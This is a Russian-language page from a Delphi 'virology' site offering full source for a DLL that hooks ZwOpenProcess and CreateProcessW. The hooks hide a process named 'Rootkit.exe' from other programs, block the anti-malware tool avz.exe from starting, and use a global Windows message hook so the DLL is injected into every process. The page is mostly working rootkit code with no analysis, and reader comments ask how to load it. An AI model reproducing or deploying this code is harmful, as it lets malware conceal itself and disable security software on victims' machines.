Пишем простой HOOK на CreateProcess - Вирусология - Delphi - Каталог статей - Вирусология, взгляд из Delphi
Четверг, 08.12.2016, 01:13 Приветствую вас Гость | Группа "Гости" 


Меню сайта

Категории раздела
Вирусология [39]
Статьи о вирусах
Системные [0]
Работа с системой
Примеры [44]
Приёмы, функции, процедуры
Ceти [1]
Работа с интернет
Приколы [5]
Пишем шуточные програмки
Остальное [5]
Всё что не вошло

Администрация
000000 dolphin

Помощь проекту

R106276538945
Z160640024212

Яндекс деньги
410011190732605

Недавние темы

Опрос
Сколько вы платите в месяц за интернет?
Всего ответов: 288

Главная » Статьи » Delphi » Вирусология

Пишем простой HOOK на CreateProcess
library HOOK;

uses
Windows, SysUtils, TLhelp32;

type
NTStatus = cardinal;
far_jmp = packed record
push:byte;
PProc:pointer;
ret:byte;
end;

OldCode = packed record
one:dword;
two:word;
end;

PUnicodeString = ^TUnicodeString;
TUnicodeString = packed record
Length: Word;
MaximumLength: Word;
Buffer: PWideChar;
end;

PObjectAttributes = ^TObjectAttributes;
TObjectAttributes = packed record
Length: DWORD;
RootDirectory: THandle;
ObjectName: PUnicodeString;
Attributes: DWORD;
SecurityDescriptor: Pointer;
SecurityQualityOfService: Pointer;
end;

PClientID = ^TClientID;
TClientID = packed record
UniqueProcess:cardinal;
UniqueThread:cardinal;
end;

type
PStartupInfo = ^TStartupInfo;
STARTUPINFOW = record
cb: DWORD;
lpReserved: Pointer;
lpDesktop: Pointer;
lpTitle: Pointer;
dwX: DWORD;
dwY: DWORD;
dwXSize: DWORD;
dwYSize: DWORD;
dwXCountChars: DWORD;
dwYCountChars: DWORD;
dwFillAttribute: DWORD;
dwFlags: DWORD;
wShowWindow: Word;
cbReserved2: Word;
lpReserved2: PByte;
hStdInput: THandle;
hStdOutput: THandle;
hStdError: THandle;
end;
TStartupInfo = _STARTUPINFOA;
STARTUPINFO = _STARTUPINFOA;

PProcessInformation = ^TProcessInformation;
_PROCESS_INFORMATION = record
hProcess: THandle;
hThread: THandle;
dwProcessId: DWORD;
dwThreadId: DWORD;
end;
TProcessInformation = _PROCESS_INFORMATION;
PROCESS_INFORMATION = _PROCESS_INFORMATION;

Type
USHORT = Word;
PWSTR = {$IFDEF USE_DELPHI_TYPES} Windows.LPWSTR {$ELSE} PWideChar {$ENDIF};
HANDLE = {$IFDEF USE_DELPHI_TYPES} Windows.THandle {$ELSE} Longword {$ENDIF};
PHANDLE = {$IFDEF USE_DELPHI_TYPES} Windows.PHandle {$ELSE} ^HANDLE {$ENDIF};
PVOID = Pointer;
type
PUNICODE_STRING = ^UNICODE_STRING;
_UNICODE_STRING = record
Length: USHORT;
MaximumLength: USHORT;
Buffer: PWSTR;
end;
UNICODE_STRING = _UNICODE_STRING;
PCUNICODE_STRING = ^UNICODE_STRING;

const
STATUS_ACCESS_DENIED = NTStatus($C0000022);
STATUS_SUCCESS = NTSTATUS($00000000);

Function ZwOpenProcess(phProcess:PDWORD; AccessMask:DWORD; ObjectAttributes:PObjectAttributes;
ClientID:PClientID): NTStatus; stdcall; external 'ntdll.dll' name 'ZwOpenProcess';

function CreateProcessW(lpApplicationName: PWideChar; lpCommandLine: PWideChar;
lpProcessAttributes, lpThreadAttributes: PSecurityAttributes;
bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer;
lpCurrentDirectory: PWideChar; const lpStartupInfo: TStartupInfo;
var lpProcessInformation: TProcessInformation): BOOL; stdcall; external 'kernel32.dll' name 'CreateProcessW';

function CreateProcessA(lpApplicationName: PAnsiChar; lpCommandLine: PAnsiChar;
lpProcessAttributes, lpThreadAttributes: PSecurityAttributes;
bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer;
lpCurrentDirectory: PAnsiChar; const lpStartupInfo: TStartupInfo;
var lpProcessInformation: TProcessInformation): BOOL; stdcall; external 'kernel32.dll' name 'CreateProcessA';

var
PFunc, CPA, CPW: pointer;
OldFunc, OldCPA, OldCPW: OldCode;
NewFunc, JmpCPA, JmpCPW: Far_jmp;
b, pid: dword;

procedure UnHook;
begin
WriteProcessMemory(INVALID_HANDLE_VALUE,PFunc,@OldFunc,sizeof(Oldcode),b);
WriteProcessMemory(INVALID_HANDLE_VALUE,CPA,@OldCPA,sizeof(Oldcode),b);
end;

function TrueCreateProcessW(lpApplicationName: PWideChar; lpCommandLine: PWideChar;
lpProcessAttributes, lpThreadAttributes: PSecurityAttributes;
bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer;
lpCurrentDirectory: PWideChar; const lpStartupInfo: TStartupInfo;
var lpProcessInformation: TProcessInformation): BOOL; stdcall;
begin
WriteProcessMemory(INVALID_HANDLE_VALUE,CPA,@OldCPA,sizeof(Oldcode),b);
Result:= CreateProcessW(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes,
bInheritHandles, dwCreationFlags, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);
WriteProcessMemory(INVALID_HANDLE_VALUE,CPA,@JmpCPA,sizeof(far_jmp),b);
end;

function NewCreateProcessW(lpApplicationName: PWideChar; lpCommandLine: PWideChar;
lpProcessAttributes, lpThreadAttributes: PSecurityAttributes;
bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer;
lpCurrentDirectory: PWideChar; const lpStartupInfo: TStartupInfo;
var lpProcessInformation: TProcessInformation): BOOL; stdcall;
begin
if (ExtractFileName(lpApplicationName)= 'avz.exe') then Result:= False else
Result := TrueCreateProcessW(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes,bInheritHandles, dwCreationFlags, lpEnvironment,
lpCurrentDirectory, lpStartupInfo, lpProcessInformation);
end;

Function TrueZwOpenProcess(phProcess:PDWORD; AccessMask:DWORD;ObjectAttributes:PObjectAttributes;
ClientID:PClientID):NTStatus;stdcall;
begin
WriteProcessMemory(INVALID_HANDLE_VALUE,PFunc,@OldFunc,sizeof(Oldcode),b);
Result:= ZwOpenProcess(phProcess,AccessMask,ObjectAttributes,ClientID);
WriteProcessMemory(INVALID_HANDLE_VALUE,PFunc,@NewFunc,sizeof(far_jmp),b);
end;

Function NewZwOpenProcess(phProcess:PDWORD;AccessMask:DWORD;ObjectAttributes:PObjectAttributes;
ClientID:PClientID):NTStatus;stdcall;
begin
if (ClientID<>nil) and (ClientID.UniqueProcess=pid) then
begin
Result:=STATUS_ACCESS_DENIED;
exit;
end;
Result:= TrueZwOpenProcess(phProcess,AccessMask,ObjectAttributes,ClientID);
end;

Function TrueCreateProcessA(lpApplicationName: PAnsiChar; lpCommandLine: PAnsiChar;
lpProcessAttributes, lpThreadAttributes: PSecurityAttributes;
bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer;
lpCurrentDirectory: PAnsiChar; const lpStartupInfo: TStartupInfo;
var lpProcessInformation: TProcessInformation): BOOL; stdcall;
begin
WriteProcessMemory(INVALID_HANDLE_VALUE,CPW,@OldCPW,sizeof(Oldcode),b);
Result:= CreateProcessA(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes,
bInheritHandles, dwCreationFlags, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);
WriteProcessMemory(INVALID_HANDLE_VALUE,CPW,@JmpCPW,sizeof(far_jmp),b);
end;

function NewCreateProcessA(ipApplicationName: PAnsiChar; ipCommandLine: PAnsiChar; ipProcessAttributes, ipThreadAttributes: PSecurityAttributes; bInheritHandles: BOOL; dwCreationFlags: DWORD; ipEnvironment: Pointer; ipCurrentDirectory: PAnsiChar; const ipStartupInfo: TStartupInfo; var ipProcessInformation: TProcessInformation): BOOL; stdcall;
begin
Result:= TrueCreateProcessA(ipApplicationName, ipCommandLine, ipProcessAttributes, ipThreadAttributes, bInheritHandles, dwCreationFlags, ipEnvironment, ipCurrentDirectory, ipStartupInfo, ipProcessInformation);
end;

procedure SetHook;
begin
PFunc:= GetProcAddress(GetModuleHandle('ntdll.dll'),'ZwOpenProcess');
CPA:=GetProcAddress(GetModuleHandle('kernel32.dll'),'CreateProcessW');
ReadProcessMemory(INVALID_HANDLE_VALUE,PFunc,@OldFunc,sizeof(oldcode),b);
ReadProcessMemory(INVALID_HANDLE_VALUE,CPA,@OldCPA,sizeof(oldcode),b);
NewFunc.push:=$68;
NewFunc.PProc:=@NewZwOpenProcess;
NewFunc.ret:=$C3;
JmpCPA.push:=$68;
JmpCPA.PProc:=@NewCreateProcessW;
JmpCPA.ret:=$C3;
WriteProcessMemory(INVALID_HANDLE_VALUE,PFunc,@NewFunc,sizeof(far_jmp),b);
WriteProcessMemory(INVALID_HANDLE_VALUE,CPA,@JmpCPA,sizeof(far_jmp),b);
end;

function GetProcessId(ExeName: string): DWORD;
var
snap : DWORD;
pe : TprocessEntry32;
begin
result:=0;
snap:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if snap <>INVALID_HANDLE_VALUE then
begin
pe.dwSize:=sizeof(TPROCESSENTRY32);
if process32First(snap,pe) then
repeat
if pe.szExeFile = exename then
begin
result:= pe.th32ProcessID;
closehandle(snap);
exit;
end;
until not
process32Next(snap,pe);
closehandle(snap);
result:=0;
end;
end;

procedure GetPID;
begin
pid:= GetProcessID('Rootkit.exe');
end;

function MessageProc(code : integer; wParam : word; lParam : longint) : longint; stdcall;
begin
CallNextHookEx(0,code,wParam,lParam);
end;

procedure SetGlobalHookProc();
begin
SetWindowsHookEx(WH_GETMESSAGE, @MessageProc, HInstance, 0);
Sleep(INFINITE)
end;

procedure SetGlobalHook();
var
hMutex: dword;
TrId: dword;
begin
hMutex := CreateMutex(nil, false, '[{ADA5458-6AB8-7C4D-88BA-44A06478C676}]');
if GetLastError = 0 then
CreateThread(nil, 0, @SetGlobalHookProc, nil, 0, TrId)
else
CloseHandle(hMutex)
end;

procedure DLLEntryPoint(dwReason: DWord);
begin
case dwReason of
DLL_PROCESS_ATTACH:
begin
GetPID;
SetHook;
SetGlobalHook;
end;
DLL_PROCESS_DETACH:
begin
UnHook;
end;
end;
end;

begin
DllProc:= @DLLEntryPoint;
DLLEntryPoint(DLL_PROCESS_ATTACH);
end.
Категория: Вирусология | Добавил: dolphin (28.01.2012)
Просмотров: 4139 | Комментарии: 5 | Рейтинг: 4.3/6

Всего комментариев: 5
avatar
1
сам писал?или выдрал из сорса какогото?)) wink
avatar
2
а где взять PModule - Delphi???
avatar
3
Обновил, теперь без модуля.
avatar
4
Как его подгрузить?
avatar
5
Просто грузим библиотеку к программе
avatar
Профиль


Логин:
Пароль:

Поиск

Наша кнопка

Вирусология, взгляд из Delphi



Статистика
HSDN :: Рейтинг сайтов WOlist.ru - каталог качественных сайтов Рунета Яндекс.Метрика Счетчик тИЦ и PR
Статистика материалов
Файлов: 364
Форум: 1128/7979
Коментариев: 759
Новостей: 27

Статистика пользователей
Всего: 411
За неделю: 2
Вчера: 0
Сегодня: 0
Всего онлайн: 1
Гостей: 1
Пользователей: 0

delfcode.ru © 2008 - 2016 Хостинг от uCoz